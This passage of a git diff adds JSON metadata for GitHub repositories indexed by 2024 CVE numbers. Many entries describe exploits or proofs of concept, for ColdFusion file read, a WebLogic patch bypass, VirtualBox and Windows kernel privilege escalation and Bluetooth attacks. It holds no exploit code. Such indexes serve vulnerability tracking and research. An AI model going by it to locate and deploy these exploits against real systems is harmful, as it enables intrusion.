"2024-12-20T11:38:34Z", + "pushed_at": "2024-02-15T14:08:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "microsoft", + "patch", + "script", + "update", + "vulnerabilities" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822528570, + "name": "CVE-2024-20666", + "full_name": "invaderslabs\/CVE-2024-20666", + "owner": { + "login": "invaderslabs", + "id": 149894888, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149894888?v=4", + "html_url": "https:\/\/github.com\/invaderslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/invaderslabs\/CVE-2024-20666", + "description": "CVE-2024-20666 vulnerability Solution patch failures in the Windows Recovery Environment (WinRE).", + "fork": false, + "created_at": "2024-07-01T10:14:40Z", + "updated_at": "2024-08-29T13:31:14Z", + "pushed_at": "2024-07-21T13:36:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20696.json b/2024/CVE-2024-20696.json new file mode 100644 index 0000000000..5d81dee4c1 --- /dev/null +++ b/2024/CVE-2024-20696.json @@ -0,0 +1,33 @@ +[ + { + "id": 768940221, + "name": "CVE-2024-20696", + "full_name": "clearbluejar\/CVE-2024-20696", + "owner": { + "login": "clearbluejar", + "id": 3752074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3752074?v=4", + "html_url": "https:\/\/github.com\/clearbluejar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/clearbluejar\/CVE-2024-20696", + "description": null, + "fork": false, + "created_at": "2024-03-08T02:31:41Z", + "updated_at": "2024-12-12T13:01:40Z", + "pushed_at": "2024-03-12T13:33:58Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20698.json b/2024/CVE-2024-20698.json new file mode 100644 index 0000000000..a98a28f89f --- /dev/null +++ b/2024/CVE-2024-20698.json @@ -0,0 +1,40 @@ +[ + { + "id": 744332003, + "name": "CVE-2024-20698", + "full_name": "RomanRybachek\/CVE-2024-20698", + "owner": { + "login": "RomanRybachek", + "id": 64448710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64448710?v=4", + "html_url": "https:\/\/github.com\/RomanRybachek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RomanRybachek\/CVE-2024-20698", + "description": "Analysis of the vulnerability", + "fork": false, + "created_at": "2024-01-17T04:35:42Z", + "updated_at": "2024-11-28T07:15:40Z", + "pushed_at": "2024-01-23T16:30:55Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "integer-overflow", + "ntoskrnl", + "reverse-engineering", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 5, + "watchers": 48, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2074.json b/2024/CVE-2024-2074.json new file mode 100644 index 0000000000..e6e70e5ce0 --- /dev/null +++ b/2024/CVE-2024-2074.json @@ -0,0 +1,33 @@ +[ + { + "id": 765177004, + "name": "CVE-2024-2074", + "full_name": "yuziiiiiiiiii\/CVE-2024-2074", + "owner": { + "login": "yuziiiiiiiiii", + "id": 138445912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138445912?v=4", + "html_url": "https:\/\/github.com\/yuziiiiiiiiii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuziiiiiiiiii\/CVE-2024-2074", + "description": "CVE-2024-2074", + "fork": false, + "created_at": "2024-02-29T12:30:37Z", + "updated_at": "2024-03-04T04:25:28Z", + "pushed_at": "2024-02-29T12:37:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20746.json b/2024/CVE-2024-20746.json new file mode 100644 index 0000000000..da9d8efe06 --- /dev/null +++ b/2024/CVE-2024-20746.json @@ -0,0 +1,33 @@ +[ + { + "id": 845363771, + "name": "CVE-2024-20746", + "full_name": "200101WhoAmI\/CVE-2024-20746", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2024-20746", + "description": "adobe premiere pro", + "fork": false, + "created_at": "2024-08-21T05:29:10Z", + "updated_at": "2024-08-21T05:29:11Z", + "pushed_at": "2024-08-21T05:29:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20767.json b/2024/CVE-2024-20767.json new file mode 100644 index 0000000000..1517f654b5 --- /dev/null +++ b/2024/CVE-2024-20767.json @@ -0,0 +1,130 @@ +[ + { + "id": 777601582, + "name": "CVE-2024-20767", + "full_name": "yoryio\/CVE-2024-20767", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2024-20767", + "description": "Exploit for CVE-2024-20767 - Adobe ColdFusion", + "fork": false, + "created_at": "2024-03-26T06:51:08Z", + "updated_at": "2024-12-19T04:04:55Z", + "pushed_at": "2024-12-19T04:04:52Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "adobe", + "coldfusion", + "cve-2024-20767" + ], + "visibility": "public", + "forks": 9, + "watchers": 32, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 777677405, + "name": "CVE-2024-20767", + "full_name": "m-cetin\/CVE-2024-20767", + "owner": { + "login": "m-cetin", + "id": 102237861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102237861?v=4", + "html_url": "https:\/\/github.com\/m-cetin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m-cetin\/CVE-2024-20767", + "description": "Proof of Concept for CVE-2024-20767. Arbitrary file read from Adobe ColdFusion ", + "fork": false, + "created_at": "2024-03-26T10:03:51Z", + "updated_at": "2024-04-07T07:25:53Z", + "pushed_at": "2024-03-26T10:18:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 777932789, + "name": "CVE-2024-20767", + "full_name": "Chocapikk\/CVE-2024-20767", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-20767", + "description": "Exploit Toolkit for Adobe ColdFusion CVE-2024-20767 Vulnerability", + "fork": false, + "created_at": "2024-03-26T19:17:14Z", + "updated_at": "2024-08-12T20:33:14Z", + "pushed_at": "2024-03-26T19:21:19Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 780337996, + "name": "CVE-2024-20767-Adobe-ColdFusion", + "full_name": "Praison001\/CVE-2024-20767-Adobe-ColdFusion", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-20767-Adobe-ColdFusion", + "description": "Exploit for CVE-2024-20767 affecting Adobe ColdFusion", + "fork": false, + "created_at": "2024-04-01T09:01:30Z", + "updated_at": "2024-04-01T18:53:20Z", + "pushed_at": "2024-04-01T09:03:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20931.json b/2024/CVE-2024-20931.json new file mode 100644 index 0000000000..34ed0cf20a --- /dev/null +++ b/2024/CVE-2024-20931.json @@ -0,0 +1,126 @@ +[ + { + "id": 751635756, + "name": "CVE-2024-20931", + "full_name": "GlassyAmadeus\/CVE-2024-20931", + "owner": { + "login": "GlassyAmadeus", + "id": 54050849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54050849?v=4", + "html_url": "https:\/\/github.com\/GlassyAmadeus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GlassyAmadeus\/CVE-2024-20931", + "description": "The Poc for CVE-2024-20931", + "fork": false, + "created_at": "2024-02-02T01:58:49Z", + "updated_at": "2024-12-07T12:00:54Z", + "pushed_at": "2024-02-02T02:05:01Z", + "stargazers_count": 72, + "watchers_count": 72, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 72, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 753453515, + "name": "CVE-2024-20931-Poc", + "full_name": "Leocodefocus\/CVE-2024-20931-Poc", + "owner": { + "login": "Leocodefocus", + "id": 7281742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7281742?v=4", + "html_url": "https:\/\/github.com\/Leocodefocus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Leocodefocus\/CVE-2024-20931-Poc", + "description": null, + "fork": false, + "created_at": "2024-02-06T06:35:07Z", + "updated_at": "2024-02-06T15:41:44Z", + "pushed_at": "2024-02-07T00:34:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753513515, + "name": "CVE-2024-20931_weblogic", + "full_name": "ATonysan\/CVE-2024-20931_weblogic", + "owner": { + "login": "ATonysan", + "id": 149130294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149130294?v=4", + "html_url": "https:\/\/github.com\/ATonysan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ATonysan\/CVE-2024-20931_weblogic", + "description": null, + "fork": false, + "created_at": "2024-02-06T09:21:08Z", + "updated_at": "2024-06-15T08:19:03Z", + "pushed_at": "2024-02-06T09:49:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753664721, + "name": "CVE-2024-20931", + "full_name": "dinosn\/CVE-2024-20931", + "owner": { + "login": "dinosn", + "id": 3851678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4", + "html_url": "https:\/\/github.com\/dinosn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinosn\/CVE-2024-20931", + "description": "CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839", + "fork": false, + "created_at": "2024-02-06T15:09:33Z", + "updated_at": "2024-11-02T04:11:58Z", + "pushed_at": "2024-02-06T15:56:12Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 61, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21006.json b/2024/CVE-2024-21006.json new file mode 100644 index 0000000000..0926150e2d --- /dev/null +++ b/2024/CVE-2024-21006.json @@ -0,0 +1,95 @@ +[ + { + "id": 794384312, + "name": "CVE-2024-21006", + "full_name": "momika233\/CVE-2024-21006", + "owner": { + "login": "momika233", + "id": 56291820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4", + "html_url": "https:\/\/github.com\/momika233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momika233\/CVE-2024-21006", + "description": null, + "fork": false, + "created_at": "2024-05-01T03:08:48Z", + "updated_at": "2024-12-09T09:17:34Z", + "pushed_at": "2024-05-05T09:40:22Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822946778, + "name": "CVE-2024-21006_jar", + "full_name": "lightr3d\/CVE-2024-21006_jar", + "owner": { + "login": "lightr3d", + "id": 113666792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113666792?v=4", + "html_url": "https:\/\/github.com\/lightr3d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lightr3d\/CVE-2024-21006_jar", + "description": "CVE-2024-21006 exp", + "fork": false, + "created_at": "2024-07-02T06:25:14Z", + "updated_at": "2024-12-03T03:25:22Z", + "pushed_at": "2024-07-29T19:39:15Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 833388994, + "name": "CVE-2024-21006", + "full_name": "dadvlingd\/CVE-2024-21006", + "owner": { + "login": "dadvlingd", + "id": 61039959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61039959?v=4", + "html_url": "https:\/\/github.com\/dadvlingd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dadvlingd\/CVE-2024-21006", + "description": null, + "fork": false, + "created_at": "2024-07-25T00:32:00Z", + "updated_at": "2024-11-01T13:03:01Z", + "pushed_at": "2024-07-25T00:39:52Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21107.json b/2024/CVE-2024-21107.json new file mode 100644 index 0000000000..5f74eee180 --- /dev/null +++ b/2024/CVE-2024-21107.json @@ -0,0 +1,33 @@ +[ + { + "id": 787760798, + "name": "CVE-2024-21107", + "full_name": "Alaatk\/CVE-2024-21107", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-21107", + "description": "Oracle VM VirtualBox for Windows prior to 7.0.16 - Elevation of Privileges", + "fork": false, + "created_at": "2024-04-17T06:13:20Z", + "updated_at": "2024-04-17T11:51:14Z", + "pushed_at": "2024-04-17T06:19:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21111.json b/2024/CVE-2024-21111.json new file mode 100644 index 0000000000..d0faa84596 --- /dev/null +++ b/2024/CVE-2024-21111.json @@ -0,0 +1,95 @@ +[ + { + "id": 790047378, + "name": "CVE-2024-21111", + "full_name": "mansk1es\/CVE-2024-21111", + "owner": { + "login": "mansk1es", + "id": 74832816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74832816?v=4", + "html_url": "https:\/\/github.com\/mansk1es", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mansk1es\/CVE-2024-21111", + "description": "Oracle VirtualBox Elevation of Privilege (Local Privilege Escalation) Vulnerability", + "fork": false, + "created_at": "2024-04-22T07:05:04Z", + "updated_at": "2024-12-20T15:01:42Z", + "pushed_at": "2024-05-09T16:39:55Z", + "stargazers_count": 217, + "watchers_count": 217, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 217, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 801847759, + "name": "CVE-2024-21111-del", + "full_name": "10cks\/CVE-2024-21111-del", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-21111-del", + "description": null, + "fork": false, + "created_at": "2024-05-17T03:09:54Z", + "updated_at": "2024-05-17T07:56:14Z", + "pushed_at": "2024-05-17T03:13:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810111483, + "name": "CVE-2024-21111", + "full_name": "x0rsys\/CVE-2024-21111", + "owner": { + "login": "x0rsys", + "id": 13172129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13172129?v=4", + "html_url": "https:\/\/github.com\/x0rsys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x0rsys\/CVE-2024-21111", + "description": "Precompiled binaries for Privilege Escalation in Oracle VM Virtual box prior to 7.0.16", + "fork": false, + "created_at": "2024-06-04T04:24:47Z", + "updated_at": "2024-11-14T23:00:05Z", + "pushed_at": "2024-06-04T14:32:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21182.json b/2024/CVE-2024-21182.json new file mode 100644 index 0000000000..9e534c65f5 --- /dev/null +++ b/2024/CVE-2024-21182.json @@ -0,0 +1,33 @@ +[ + { + "id": 909779451, + "name": "CVE-2024-21182", + "full_name": "kursadalsan\/CVE-2024-21182", + "owner": { + "login": "kursadalsan", + "id": 108494826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108494826?v=4", + "html_url": "https:\/\/github.com\/kursadalsan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kursadalsan\/CVE-2024-21182", + "description": "PoC for CVE-2024-21182", + "fork": false, + "created_at": "2024-12-29T18:45:22Z", + "updated_at": "2025-01-06T09:49:55Z", + "pushed_at": "2024-12-29T15:56:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21305.json b/2024/CVE-2024-21305.json new file mode 100644 index 0000000000..37e6eb3ac3 --- /dev/null +++ b/2024/CVE-2024-21305.json @@ -0,0 +1,36 @@ +[ + { + "id": 732514348, + "name": "CVE-2024-21305", + "full_name": "tandasat\/CVE-2024-21305", + "owner": { + "login": "tandasat", + "id": 1620923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1620923?v=4", + "html_url": "https:\/\/github.com\/tandasat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tandasat\/CVE-2024-21305", + "description": "Report and exploit of CVE-2024-21305. ", + "fork": false, + "created_at": "2023-12-16T23:27:34Z", + "updated_at": "2024-11-28T15:39:56Z", + "pushed_at": "2024-01-14T17:21:42Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "hyper-v", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21306.json b/2024/CVE-2024-21306.json new file mode 100644 index 0000000000..1941356786 --- /dev/null +++ b/2024/CVE-2024-21306.json @@ -0,0 +1,95 @@ +[ + { + "id": 783479957, + "name": "C-PoC-for-CVE-2024-21306", + "full_name": "d4rks1d33\/C-PoC-for-CVE-2024-21306", + "owner": { + "login": "d4rks1d33", + "id": 44416061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44416061?v=4", + "html_url": "https:\/\/github.com\/d4rks1d33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4rks1d33\/C-PoC-for-CVE-2024-21306", + "description": null, + "fork": false, + "created_at": "2024-04-08T01:15:21Z", + "updated_at": "2024-04-08T23:57:28Z", + "pushed_at": "2024-04-08T23:59:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796468551, + "name": "BadBlue", + "full_name": "PhucHauDeveloper\/BadBlue", + "owner": { + "login": "PhucHauDeveloper", + "id": 62100779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62100779?v=4", + "html_url": "https:\/\/github.com\/PhucHauDeveloper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PhucHauDeveloper\/BadBlue", + "description": "CVE-2024-21306 BadBlue implementation (Using DuckyScript)", + "fork": false, + "created_at": "2024-05-06T02:05:02Z", + "updated_at": "2024-12-21T07:04:49Z", + "pushed_at": "2024-07-11T05:13:43Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 903599533, + "name": "blueXploit", + "full_name": "Danyw24\/blueXploit", + "owner": { + "login": "Danyw24", + "id": 81335686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81335686?v=4", + "html_url": "https:\/\/github.com\/Danyw24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Danyw24\/blueXploit", + "description": "Exploit basado en vulnerabilidades criticas Bluetooth (CVE-2023-45866, CVE-2024-21306)", + "fork": false, + "created_at": "2024-12-15T03:00:47Z", + "updated_at": "2025-01-06T02:41:59Z", + "pushed_at": "2024-12-15T06:41:13Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21320.json b/2024/CVE-2024-21320.json new file mode 100644 index 0000000000..67b6e07292 --- /dev/null +++ b/2024/CVE-2024-21320.json @@ -0,0 +1,33 @@ +[ + { + "id": 880686304, + "name": "CVE-2024-21320-POC", + "full_name": "sxyrxyy\/CVE-2024-21320-POC", + "owner": { + "login": "sxyrxyy", + "id": 125439203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125439203?v=4", + "html_url": "https:\/\/github.com\/sxyrxyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxyrxyy\/CVE-2024-21320-POC", + "description": null, + "fork": false, + "created_at": "2024-10-30T06:58:19Z", + "updated_at": "2024-12-06T07:24:00Z", + "pushed_at": "2024-10-30T06:58:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21338.json b/2024/CVE-2024-21338.json new file mode 100644 index 0000000000..1b1d373b70 --- /dev/null +++ b/2024/CVE-2024-21338.json @@ -0,0 +1,193 @@ +[ + { + "id": 785999615, + "name": "CVE-2024-21338", + "full_name": "hakaioffsec\/CVE-2024-21338", + "owner": { + "login": "hakaioffsec", + "id": 99059183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99059183?v=4", + "html_url": "https:\/\/github.com\/hakaioffsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hakaioffsec\/CVE-2024-21338", + "description": "Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.", + "fork": false, + "created_at": "2024-04-13T05:53:02Z", + "updated_at": "2024-12-01T19:10:59Z", + "pushed_at": "2024-04-16T21:00:14Z", + "stargazers_count": 288, + "watchers_count": 288, + "has_discussions": false, + "forks_count": 60, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 60, + "watchers": 288, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 787860602, + "name": "CVE-2024-21338", + "full_name": "UMU618\/CVE-2024-21338", + "owner": { + "login": "UMU618", + "id": 1729732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1729732?v=4", + "html_url": "https:\/\/github.com\/UMU618", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UMU618\/CVE-2024-21338", + "description": "Fork of https:\/\/github.com\/hakaioffsec\/CVE-2024-21338", + "fork": false, + "created_at": "2024-04-17T10:16:21Z", + "updated_at": "2024-06-26T06:01:33Z", + "pushed_at": "2024-04-17T10:33:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 790920623, + "name": "CVE-2024-21338", + "full_name": "varwara\/CVE-2024-21338", + "owner": { + "login": "varwara", + "id": 167913816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167913816?v=4", + "html_url": "https:\/\/github.com\/varwara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/varwara\/CVE-2024-21338", + "description": "PoC for the Untrusted Pointer Dereference in the appid.sys driver", + "fork": false, + "created_at": "2024-04-23T19:09:22Z", + "updated_at": "2024-12-27T13:05:38Z", + "pushed_at": "2024-04-23T19:13:53Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 802543804, + "name": "CVE-2024-21338-x64-build-", + "full_name": "Zombie-Kaiser\/CVE-2024-21338-x64-build-", + "owner": { + "login": "Zombie-Kaiser", + "id": 141570642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141570642?v=4", + "html_url": "https:\/\/github.com\/Zombie-Kaiser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zombie-Kaiser\/CVE-2024-21338-x64-build-", + "description": "Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.", + "fork": false, + "created_at": "2024-05-18T15:38:34Z", + "updated_at": "2024-08-24T14:07:41Z", + "pushed_at": "2024-05-22T17:06:06Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818876565, + "name": "CVE-2024-21338_PoC", + "full_name": "tykawaii98\/CVE-2024-21338_PoC", + "owner": { + "login": "tykawaii98", + "id": 45362197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45362197?v=4", + "html_url": "https:\/\/github.com\/tykawaii98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tykawaii98\/CVE-2024-21338_PoC", 